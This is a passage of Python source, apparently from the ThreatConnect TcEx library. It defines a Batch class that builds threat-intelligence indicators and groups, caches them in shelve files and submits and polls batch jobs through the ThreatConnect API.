"summary": "53c3609411c83f363e051d455ade78a7
: 57a49b478310e4313c54c0fee46e4d70a73dd580
: db31cb2a748b7e0046d8c97a32a7eb4efde32a0593e5dbd58e07a3b4ae6bf3d7",
"associatedGroups": [
{
"groupXid": "e336e2dd-5dfb-48cd-a33a-f8809e83e904"
}
],
"attribute": [{
"type": "Source",
"displayed": true,
"value": "Malware Analysis provided by external AMA."
}],
"fileOccurrence": [{
"fileName": "drop1.exe",
"date": "2017-03-03T18:00:00-06:00"
}],
"tag": [{
"name": "China"
}],
"xid": "e336e2dd-5dfb-48cd-a33a-f8809e83e904:170139"
}
Args:
indicator_data: The Full Indicator data including attributes, labels, tags,
and associations.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Union[dict, object]: The new group dict/object or the previously stored dict/object.
"""
if indicator_data.get('type') not in ['Address', 'EmailAddress', 'File', 'Host', 'URL']:
# for custom indicator types the valueX fields are required.
# using the summary we can build the values
index = 1
for value in self._indicator_values(indicator_data.get('summary')):
indicator_data[f'value{index}'] = value
index += 1
if indicator_data.get('type') == 'File':
# convert custom field name to the appropriate value for batch v2
size = indicator_data.pop('size', None)
if size is not None:
indicator_data['intValue1'] = size
if indicator_data.get('type') == 'Host':
# convert custom field name to the appropriate value for batch v2
dns_active = indicator_data.pop('dnsActive', None)
if dns_active is not None:
indicator_data['flag1'] = dns_active
whois_active = indicator_data.pop('whoisActive', None)
if whois_active is not None:
indicator_data['flag2'] = whois_active
return self._indicator(indicator_data, kwargs.get('store', True))
def address(self, ip: str, **kwargs) -> Address:
"""Add Address data to Batch object.
Args:
ip: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Address: An instance of the Address class.
"""
indicator_obj = Address(ip, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def adversary(self, name: str, **kwargs) -> Adversary:
"""Add Adversary data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Adversary: An instance of the Adversary class.
"""
group_obj = Adversary(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def asn(self, as_number: str, **kwargs) -> ASN:
"""Add ASN data to Batch object.
Args:
as_number: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
ASN: An instance of the ASN class.
"""
indicator_obj = ASN(as_number, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
@property
def attribute_write_type(self):
"""Return batch attribute write type."""
return self._attribute_write_type
@attribute_write_type.setter
def attribute_write_type(self, attribute_write_type: str):
"""Set batch attribute write type."""
self._attribute_write_type = attribute_write_type
def campaign(self, name: str, **kwargs) -> Campaign:
"""Add Campaign data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
first_seen (str, kwargs): The first seen datetime expression for this Group.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Campaign: An instance of the Campaign class.
"""
group_obj = Campaign(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def cidr(self, block: str, **kwargs) -> CIDR:
"""Add CIDR data to Batch object.
Args:
block: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
CIDR: An instance of the CIDR class.
"""
indicator_obj = CIDR(block, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def close(self) -> None:
"""Cleanup batch job."""
# allow pol thread to complete before wrapping up
if hasattr(self._submit_thread, 'is_alive'):
self._submit_thread.join()
# allow file threads to complete before wrapping up job
for t in self._file_threads:
t.join()
self.groups_shelf.close()
self.indicators_shelf.close()
if not self.debug and not self.enable_saved_file:
# delete saved files
if os.path.isfile(self.group_shelf_fqfn):
os.remove(self.group_shelf_fqfn)
if os.path.isfile(self.group_shelf_fqfn):
os.remove(self.indicator_shelf_fqfn)
@property
def data(self):
"""Return the batch indicator/group and file data to be sent to the ThreatConnect API.
**Processing Order:**
* Process groups in memory up to max batch size.
* Process groups in shelf to max batch size.
* Process indicators in memory up to max batch size.
* Process indicators in shelf up to max batch size.
This method will remove the group/indicator from memory and/or shelf.
Returns:
dict: A dictionary of group, indicators, and/or file data.
"""
data = {'file': {}, 'group': [], 'indicator': []}
tracker = {'count': 0, 'bytes': 0}
# process group from memory, returning if max values have been reached
if self.data_groups(data, self.groups, tracker) is True:
return data
# process group from shelf file, returning if max values have been reached
if self.data_groups(data, self.groups_shelf, tracker) is True:
return data
# process indicator from memory, returning if max values have been reached
if self.data_indicators(data, self.indicators, tracker) is True:
return data
# process indicator from shelf file, returning if max values have been reached
if self.data_indicators(data, self.indicators_shelf, tracker) is True:
return data
return data
def data_group_association(self, data: dict, tracker: dict, xid: str) -> None:
"""Return group dict array following all associations.
The *data* dict is passed by reference to make it easier to update both the group data
and file data inline versus passing the data all the way back up to the calling methods.
Args:
data: The data dict to update with group and file data.
tracker: A dict containing total count of all entities collected and
the total size in bytes of all entities collected.
xid: The xid of the group to retrieve associations.
"""
xids = deque()
xids.append(xid)
while xids:
xid = xids.popleft() # remove current xid
group_data = None
if xid in self.groups:
group_data = self.groups.get(xid)
del self.groups[xid]
elif xid in self.groups_shelf:
group_data = self.groups_shelf.get(xid)
del self.groups_shelf[xid]
if group_data:
file_data, group_data = self.data_group_type(group_data)
data['group'].append(group_data)
if file_data:
data['file'][xid] = file_data
# update entity trackers
tracker['count'] += 1
tracker['bytes'] += sys.getsizeof(json.dumps(group_data))
# extend xids with any groups associated with the same object
xids.extend(group_data.get('associatedGroupXid', []))
@staticmethod
def data_group_type(group_data: Union[dict, object]) -> Tuple[dict, dict]:
"""Return dict representation of group data and file data.
Args:
group_data: The group data dict or object.
Returns:
Tuple[dict, dict]: A tuple containing file_data and group_data.
"""
file_data = {}
if isinstance(group_data, dict):
# process file content
file_content = group_data.pop('fileContent', None)
if file_content is not None:
file_data = {
'fileContent': file_content,
'fileName': group_data.get('fileName'),
'type': group_data.get('type'),
}
else:
# get the file data from the object and return dict format of object
if group_data.data.get('type') in ['Document', 'Report']:
file_data = group_data.file_data
group_data = group_data.data
return file_data, group_data
def data_groups(self, data: dict, groups: list, tracker: dict) -> bool:
"""Process Group data.
Args:
data: The data dict to update with group and file data.
groups: The list of groups to process.
tracker: A dict containing total count of all entities collected and
the total size in bytes of all entities collected.
Returns:
bool: True if max values have been hit, else False.
"""
# convert groups.keys() to a list to prevent dictionary change error caused by
# the data_group_association function deleting items from the object.
# process group objects
for xid in list(groups.keys()):
# get association from group data
self.data_group_association(data, tracker, xid)
if tracker.get('count') % 2_500 == 0:
# log count/size at a sane level
self.tcex.log.info(
'''feature=batch, action=data-groups, '''
f'''count={tracker.get('count'):,}, bytes={tracker.get('bytes'):,}'''
)
if (
tracker.get('count') >= self._batch_max_chunk
or tracker.get('bytes') >= self._batch_max_size
):
# stop processing xid once max limit are reached
self.tcex.log.info(
'''feature=batch, event=max-value-reached, '''
f'''count={tracker.get('count'):,}, bytes={tracker.get('bytes'):,}'''
)
return True
return False
def data_indicators(self, data: dict, indicators: list, tracker: dict) -> bool:
"""Process Indicator data.
Args:
data: The data dict to update with group and file data.
indicators: The list of indicators to process.
tracker: A dict containing total count of all entities collected and
the total size in bytes of all entities collected.
Returns:
bool: True if max values have been hit, else False.
"""
# process indicator objects
for xid, indicator_data in list(indicators.items()):
if not isinstance(indicator_data, dict):
indicator_data = indicator_data.data
data['indicator'].append(indicator_data)
del indicators[xid]
# update entity trackers
tracker['count'] += 1
tracker['bytes'] += sys.getsizeof(json.dumps(indicator_data))
if tracker.get('count') % 2_500 == 0:
# log count/size at a sane level
self.tcex.log.info(
'''feature=batch, action=data-indicators, '''
f'''count={tracker.get('count'):,}, bytes={tracker.get('bytes'):,}'''
)
if (
tracker.get('count') >= self._batch_max_chunk
or tracker.get('bytes') >= self._batch_max_size
):
# stop processing xid once max limit are reached
self.tcex.log.info(
'''feature=batch, event=max-value-reached, '''
f'''count={tracker.get('count'):,}, bytes={tracker.get('bytes'):,}'''
)
return True
return False
@property
def debug(self):
"""Return debug setting"""
if self._debug is None:
self._debug = False
# switching DEBUG file to a directory
if os.path.isfile(self.debug_path):
os.remove(self.debug_path)
os.makedirs(self.debug_path, exist_ok=True)
if os.path.isdir(self.debug_path) and os.access(self.debug_path, os.R_OK):
# create directories only required when debug is enabled
# batch_json - store the batch*.json files
# documents - store the file downloads (e.g., *.pdf)
# reports - store the file downloads (e.g., *.pdf)
os.makedirs(self.debug_path, exist_ok=True)
os.makedirs(self.debug_path_batch, exist_ok=True)
os.makedirs(self.debug_path_files, exist_ok=True)
self._debug = True
return self._debug
def document(self, name: str, file_name: str, **kwargs) -> Document:
"""Add Document data to Batch object.
Args:
name: The name for this Group.
file_name: The name for the attached file for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
file_content (str;method, kwargs): The file contents or
callback method to retrieve file content.
malware (bool, kwargs): If true the file is considered malware.
password (bool, kwargs): If malware is true a password for the zip archive is
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Document: An instance of the Document class.
"""
group_obj = Document(name, file_name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def email(self, name: str, subject: str, header: str, body: str, **kwargs) -> Email:
"""Add Email data to Batch object.
Args:
name: The name for this Group.
subject: The subject for this Email.
header: The header for this Email.
body: The body for this Email.
date_added (str, kwargs): The date timestamp the Indicator was created.
from_addr (str, kwargs): The **from** address for this Email.
to_addr (str, kwargs): The **to** address for this Email.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Email: An instance of the Email class.
"""
group_obj = Email(name, subject, header, body, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def email_address(self, address: str, **kwargs) -> EmailAddress:
"""Add Email Address data to Batch object.
Args:
address: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
EmailAddress: An instance of the EmailAddress class.
"""
indicator_obj = EmailAddress(address, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
@property
def error_codes(self):
"""Return static list of Batch error codes and short description"""
return {
'0x1001': 'General Error',
'0x1002': 'Permission Error',
'0x1003': 'JsonSyntax Error',
'0x1004': 'Internal Error',
'0x1005': 'Invalid Indicator Error',
'0x1006': 'Invalid Group Error',
'0x1007': 'Item Not Found Error',
'0x1008': 'Indicator Limit Error',
'0x1009': 'Association Error',
'0x100A': 'Duplicate Item Error',
'0x100B': 'File IO Error',
'0x2001': 'Indicator Partial Loss Error',
'0x2002': 'Group Partial Loss Error',
'0x2003': 'File Hash Merge Error',
}
def errors(self, batch_id: int, halt_on_error: Optional[bool] = True) -> list:
"""Retrieve Batch errors to ThreatConnect API.
.. code-block:: javascript
[{
"errorReason": "Incident incident-001 has an invalid status.",
"errorSource": "incident-001 is not valid."
}, {
"errorReason": "Incident incident-002 has an invalid status.",
"errorSource":"incident-002 is not valid."
}]
Args:
batch_id: The ID returned from the ThreatConnect API for the current batch job.
halt_on_error: If True any exception will raise an error.
Returns:
list: A list of batch errors.
"""
errors = []
try:
self.tcex.log.debug(f'feature=batch, event=retrieve-errors, batch-id={batch_id}')
r = self.tcex.session.get(f'/v2/batch/{batch_id}/errors')
# API does not return correct content type
if r.ok:
errors = json.loads(r.text)
# temporarily process errors to find "critical" errors.
# FR in core to return error codes.
for error in errors:
error_reason = error.get('errorReason')
for error_msg in self._critical_failures:
if re.findall(error_msg, error_reason):
self.tcex.handle_error(10500, [error_reason], halt_on_error)
return errors
except Exception as e:
self.tcex.handle_error(560, [e], halt_on_error)
def event(self, name: str, **kwargs) -> Event:
"""Add Event data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
event_date (str, kwargs): The event datetime expression for this Group.
status (str, kwargs): The status for this Group.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Event: An instance of the Event class.
"""
group_obj = Event(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def file(
self,
md5: Optional[str] = None,
sha1: Optional[str] = None,
sha256: Optional[str] = None,
**kwargs,
) -> File:
"""Add File data to Batch object.
.. note:: A least one file hash value must be specified.
Args:
md5: The md5 value for this Indicator.
sha1: The sha1 value for this Indicator.
sha256: The sha256 value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
size (str, kwargs): The file size for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
File: An instance of the File class.
"""
indicator_obj = File(md5, sha1, sha256, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def file_merge_mode(self, value: str) -> None:
"""Set the file merge mode for the entire batch job.
Args:
value: A value of Distribute or Merge.
"""
self._file_merge_mode = value
@staticmethod
def generate_xid(identifier: Optional[Union[list, str]] = None):
"""Generate xid from provided identifiers.
.. Important:: If no identifier is provided a unique xid will be returned, but it will
not be reproducible. If a list of identifiers are provided they must be
in the same order to generate a reproducible xid.
Args:
identifier: Optional *string* value(s) to be
used to make a unique and reproducible xid.
"""
if identifier is None:
identifier = str(uuid.uuid4())
elif isinstance(identifier, list):
identifier = '-'.join([str(i) for i in identifier])
identifier = hashlib.sha256(identifier.encode('utf-8')).hexdigest()
return hashlib.sha256(identifier.encode('utf-8')).hexdigest()
def group(self, group_type: str, name: str, **kwargs) -> object:
"""Add Group data to Batch object.
Args:
group_type: The ThreatConnect define Group type.
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
object: An instance of one of the Group classes.
"""
group_obj = Group(group_type, name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
@property
def group_shelf_fqfn(self):
"""Return groups shelf fully qualified filename.
For testing/debugging a previous shelf file can be copied into the tc_temp_path directory
instead of creating a new shelf file.
"""
if self._group_shelf_fqfn is None:
# new shelf file
self._group_shelf_fqfn = os.path.join(
self.tcex.args.tc_temp_path, f'groups-{str(uuid.uuid4())}'
)
# saved shelf file
if self.saved_groups:
self._group_shelf_fqfn = self.debug_path_group_shelf
return self._group_shelf_fqfn
@property
def groups(self) -> dict:
"""Return dictionary of all Groups data."""
if self._groups is None:
# plain dict, but could be something else in future
self._groups = {}
return self._groups
@property
def groups_shelf(self) -> object:
"""Return dictionary of all Groups data."""
if self._groups_shelf is None:
self._groups_shelf = shelve.open(self.group_shelf_fqfn, writeback=False)
return self._groups_shelf
@property
def halt_on_error(self) -> bool:
"""Return batch halt on error setting."""
return self._halt_on_error
@halt_on_error.setter
def halt_on_error(self, halt_on_error: bool):
"""Set batch halt on error setting."""
self._halt_on_error = halt_on_error
@property
def halt_on_batch_error(self) -> bool:
"""Return halt on batch error value."""
return self._halt_on_batch_error
@halt_on_batch_error.setter
def halt_on_batch_error(self, value: bool):
"""Set batch halt on batch error value."""
if isinstance(value, bool):
self._halt_on_batch_error = value
@property
def halt_on_file_error(self) -> bool:
"""Return halt on file post error value."""
return self._halt_on_file_error
@halt_on_file_error.setter
def halt_on_file_error(self, value: bool):
"""Set halt on file post error value."""
if isinstance(value, bool):
self._halt_on_file_error = value
@property
def halt_on_poll_error(self) -> bool:
"""Return halt on poll error value."""
return self._halt_on_poll_error
@halt_on_poll_error.setter
def halt_on_poll_error(self, value: bool):
"""Set batch halt on poll error value."""
if isinstance(value, bool):
self._halt_on_poll_error = value
def hash_collision_mode(self, value: str):
"""Set the file hash collision mode for the entire batch job.
Args:
value: A value of Split, IgnoreIncoming, IgnoreExisting, FavorIncoming,
and FavorExisting.
"""
self._hash_collision_mode = value
def host(self, hostname: str, **kwargs) -> Host:
"""Add Host data to Batch object.
Args:
hostname: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
dns_active (bool, kwargs): If True DNS active is enabled for this indicator.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
whois_active (bool, kwargs): If True WhoIs active is enabled for this indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Host: An instance of the Host class.
"""
indicator_obj = Host(hostname, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def incident(self, name: str, **kwargs) -> Incident:
"""Add Incident data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
event_date (str, kwargs): The event datetime expression for this Group.
status (str, kwargs): The status for this Group.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Incident: An instance of the Incident class.
"""
group_obj = Incident(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def indicator(self, indicator_type: str, summary: str, **kwargs) -> object:
"""Add Indicator data to Batch object.
Args:
indicator_type: The ThreatConnect define Indicator type.
summary: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
object: An instance of one of the Indicator classes.
"""
indicator_obj = Indicator(indicator_type, summary, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
@property
def indicator_shelf_fqfn(self) -> str:
"""Return indicator shelf fully qualified filename.
For testing/debugging a previous shelf file can be copied into the tc_temp_path directory
instead of creating a new shelf file.
"""
if self._indicator_shelf_fqfn is None:
# new shelf file
self._indicator_shelf_fqfn = os.path.join(
self.tcex.args.tc_temp_path, f'indicators-{str(uuid.uuid4())}'
)
# saved shelf file
if self.saved_indicators:
self._indicator_shelf_fqfn = self.debug_path_indicator_shelf
return self._indicator_shelf_fqfn
@property
def indicators(self) -> dict:
"""Return dictionary of all Indicator data."""
if self._indicators is None:
# plain dict, but could be something else in future
self._indicators = {}
return self._indicators
@property
def indicators_shelf(self) -> object:
"""Return dictionary of all Indicator data."""
if self._indicators_shelf is None:
self._indicators_shelf = shelve.open(self.indicator_shelf_fqfn, writeback=False)
return self._indicators_shelf
def intrusion_set(self, name: str, **kwargs) -> IntrusionSet:
"""Add Intrusion Set data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
IntrusionSet: An instance of the IntrusionSet class.
"""
group_obj = IntrusionSet(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def mutex(self, mutex: str, **kwargs) -> Mutex:
"""Add Mutex data to Batch object.
Args:
mutex: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Mutex: An instance of the Mutex class.
"""
indicator_obj = Mutex(mutex, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def poll(
self,
batch_id: int,
retry_seconds: Optional[int] = None,
back_off: Optional[float] = None,
timeout: Optional[int] = None,
halt_on_error: Optional[bool] = True,
) -> dict:
"""Poll Batch status to ThreatConnect API.
.. code-block:: javascript
{
"status": "Success",
"data": {
"batchStatus": {
"id":3505,
"status":"Completed",
"errorCount":0,
"successCount":0,
"unprocessCount":0
}
}
}
Args:
batch_id: The ID returned from the ThreatConnect API for the current batch job.
retry_seconds: The base number of seconds used for retries when job is not completed.
back_off: A multiplier to use for backing off on
each poll attempt when job has not completed.
timeout: The number of seconds before the poll should timeout.
halt_on_error: If True any exception will raise an error.
Returns:
dict: The batch status returned from the ThreatConnect API.
"""
# check global setting for override
if self.halt_on_poll_error is not None:
halt_on_error = self.halt_on_poll_error
# initial poll interval
if self._poll_interval is None and self._batch_data_count is not None:
# calculate poll_interval base off the number of entries in the batch data
# with a minimum value of 5 seconds.
self._poll_interval = max(math.ceil(self._batch_data_count / 300), 5)
elif self._poll_interval is None:
# if not able to calculate poll_interval default to 15 seconds
self._poll_interval = 15
# poll retry back_off factor
poll_interval_back_off = float(2.5 if back_off is None else back_off)
# poll retry seconds
poll_retry_seconds = int(5 if retry_seconds is None else retry_seconds)
# poll timeout
if timeout is None:
timeout = self.poll_timeout
else:
timeout = int(timeout)
params = {'includeAdditional': 'true'}
poll_count = 0
poll_time_total = 0
data = {}
while True:
poll_count += 1
poll_time_total += self._poll_interval
time.sleep(self._poll_interval)
self.tcex.log.info(f'feature=batch, event=progress, poll-time={poll_time_total}')
try:
# retrieve job status
r = self.tcex.session.get(f'/v2/batch/{batch_id}', params=params)
if not r.ok or 'application/json' not in r.headers.get('content-type', ''):
self.tcex.handle_error(545, [r.status_code, r.text], halt_on_error)
return data
data = r.json()
if data.get('status') != 'Success':
self.tcex.handle_error(545, [r.status_code, r.text], halt_on_error)
except Exception as e:
self.tcex.handle_error(540, [e], halt_on_error)
if data.get('data', {}).get('batchStatus', {}).get('status') == 'Completed':
# store last 5 poll times to use in calculating average poll time
modifier = poll_time_total * 0.7
self._poll_interval_times = self._poll_interval_times[-4:] + [modifier]
weights = [1]
poll_interval_time_weighted_sum = 0
for poll_interval_time in self._poll_interval_times:
poll_interval_time_weighted_sum += poll_interval_time * weights[-1]
# weights will be [1, 1.5, 2.25, 3.375, 5.0625] for all 5 poll times depending
# on how many poll times are available.
weights.append(weights[-1] * 1.5)
# pop off the last weight so its not added in to the sum
weights.pop()
# calculate the weighted average of the last 5 poll times
self._poll_interval = math.floor(poll_interval_time_weighted_sum / sum(weights))
if poll_count == 1:
# if completed on first poll, reduce poll interval.
self._poll_interval = self._poll_interval * 0.85
self.tcex.log.debug(f'feature=batch, poll-time={poll_time_total}, status={data}')
return data
# update poll_interval for retry with max poll time of 20 seconds
self._poll_interval = min(
poll_retry_seconds + int(poll_count * poll_interval_back_off), 20
)
# time out poll to prevent App running indefinitely
if poll_time_total >= timeout:
self.tcex.handle_error(550, [timeout], True)
@property
def poll_timeout(self) -> int:
"""Return current poll timeout value."""
return self._poll_timeout
@poll_timeout.setter
def poll_timeout(self, seconds: int):
"""Set the poll timeout value."""
self._poll_timeout = int(seconds)
def process_all(self, process_files: Optional[bool] = True) -> None:
"""Process Batch request to ThreatConnect API.
Args:
process_files: Send any document or report attachments to the API.
"""
while True:
content = self.data
file_data = content.pop('file', {})
if not content.get('group') and not content.get('indicator'):
break
# special code for debugging App using batchV2.
self.write_batch_json(content)
# store the length of the batch data to use for poll interval calculations
self.tcex.log.info(
'''feature=batch, event=process-all, type=group, '''
f'''count={len(content.get('group')):,}'''
)
self.tcex.log.info(
'''feature=batch, event=process-all, type=indicator, '''
f'''count={len(content.get('indicator')):,}'''
)
if process_files:
self.process_files(file_data)
def process_files(self, file_data: dict) -> None:
"""Process Files for Documents and Reports to ThreatConnect API.
Args:
file_data: The file data to be processed.
"""
for xid, content_data in list(file_data.items()):
del file_data[xid] # win or loose remove the entry
# define the saved filename
api_branch = 'documents' if content_data.get('type') == 'Report' else 'reports'
fqfn = os.path.join(
self.debug_path_files,
f'''{api_branch}--{xid}--{content_data.get('fileName').replace('/', ':')}''',
)
# used for debug/testing to prevent upload of previously uploaded file
if self.debug and xid in self.saved_xids:
self.tcex.log.debug(
f'feature=batch-submit-files, action=skip-previously-saved-file, xid={xid}'
)
continue
if os.path.isfile(fqfn):
self.tcex.log.debug(
f'feature=batch-submit-files, action=skip-previously-saved-file, xid={xid}'
)
continue
# process the file content
content = content_data.get('fileContent')
if callable(content):
content_callable_name = getattr(content, '__name__', repr(content))
self.tcex.log.trace(
f'feature=batch-submit-files, method={content_callable_name}, xid={xid}'
)
content = content_data.get('fileContent')(xid)
if content is None:
self.tcex.log.warning(f'feature=batch-submit-files, xid={xid}, event=content-null')
continue
# write the file to disk
with open(fqfn, 'wb') as fh:
fh.write(content)
def registry_key(
self, key_name: str, value_name: str, value_type: str, **kwargs
) -> RegistryKey:
"""Add Registry Key data to Batch object.
Args:
key_name: The key_name value for this Indicator.
value_name: The value_name value for this Indicator.
value_type: The value_type value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
RegistryKey: An instance of the Registry Key class.
"""
indicator_obj = RegistryKey(key_name, value_name, value_type, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def report(self, name: str, **kwargs) -> Report:
"""Add Report data to Batch object.
Args:
name: The name for this Group.
file_name (str): The name for the attached file for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
file_content (str;method, kwargs): The file contents or callback method to retrieve
file content.
publish_date (str, kwargs): The publish datetime expression for this Group.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Report: An instance of the Report class.
"""
group_obj = Report(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def save(self, resource: Union[dict, object]) -> None:
"""Save group|indicator dict or object to shelve.
Best effort to save group/indicator data to disk. If for any reason the save fails
the data will still be accessible from list in memory.
Args:
resource: The Group or Indicator dict or object.
"""
resource_type = None
xid = None
if isinstance(resource, dict):
resource_type = resource.get('type')
xid = resource.get('xid')
else:
resource_type = resource.type
xid = resource.xid
if resource_type is not None and xid is not None:
saved = True
if resource_type in self.tcex.group_types:
try:
# groups
self.groups_shelf[xid] = resource
except Exception:
saved = False
if saved:
try:
del self._groups[xid]
except KeyError:
# if group was saved twice it would already be delete
pass
elif resource_type in self.tcex.indicator_types_data.keys():
try:
# indicators
self.indicators_shelf[xid] = resource
except Exception:
saved = False
if saved:
try:
del self._indicators[xid]
except KeyError:
# if indicator was saved twice it would already be delete
pass
@property
def saved_groups(self) -> bool:
"""Return True if saved group files exits, else False."""
if self._saved_groups is None:
self._saved_groups = False
if (
self.enable_saved_file
and os.path.isfile(self.debug_path_group_shelf)
and os.access(self.debug_path_group_shelf, os.R_OK)
):
self._saved_groups = True
self.tcex.log.debug('feature=batch, event=saved-groups-file-found')
return self._saved_groups
@property
def saved_indicators(self) -> bool:
"""Return True if saved indicators files exits, else False."""
if self._saved_indicators is None:
self._saved_indicators = False
if (
self.enable_saved_file
and os.path.isfile(self.debug_path_indicator_shelf)
and os.access(self.debug_path_indicator_shelf, os.R_OK)
):
self._saved_indicators = True
self.tcex.log.debug('feature=batch, event=saved-indicator-file-found')
return self._saved_indicators
@property
def saved_xids(self) -> list:
"""Return previously saved xids."""
if self._saved_xids is None:
self._saved_xids = []
if self.debug:
if os.path.isfile(self.debug_path_xids) and os.access(
self.debug_path_xids, os.R_OK
):
with open(self.debug_path_xids) as fh:
self._saved_xids = fh.read().splitlines()
return self._saved_xids
@saved_xids.setter
def saved_xids(self, xid: str):
"""Append xid to xids saved file."""
with open(self.debug_path_xids, 'a') as fh:
fh.write(f'{xid}\n')
@property
def settings(self) -> dict:
"""Return batch job settings."""
_settings = {
'action': self._action,
# not supported in v2 batch
# 'attributeWriteType': self._attribute_write_type,
'attributeWriteType': 'Replace',
'haltOnError': str(self._halt_on_error).lower(),
'owner': self._owner,
'version': 'V2',
}
if self._playbook_triggers_enabled is not None:
_settings['playbookTriggersEnabled'] = str(self._playbook_triggers_enabled).lower()
if self._hash_collision_mode is not None:
_settings['hashCollisionMode'] = self._hash_collision_mode
if self._file_merge_mode is not None:
_settings['fileMergeMode'] = self._file_merge_mode
return _settings
def signature(
self, name: str, file_name: str, file_type: str, file_text: str, **kwargs
) -> Signature:
"""Add Signature data to Batch object.
Valid file_types:
+ Snort ®
+ Suricata
+ YARA
+ ClamAV ®
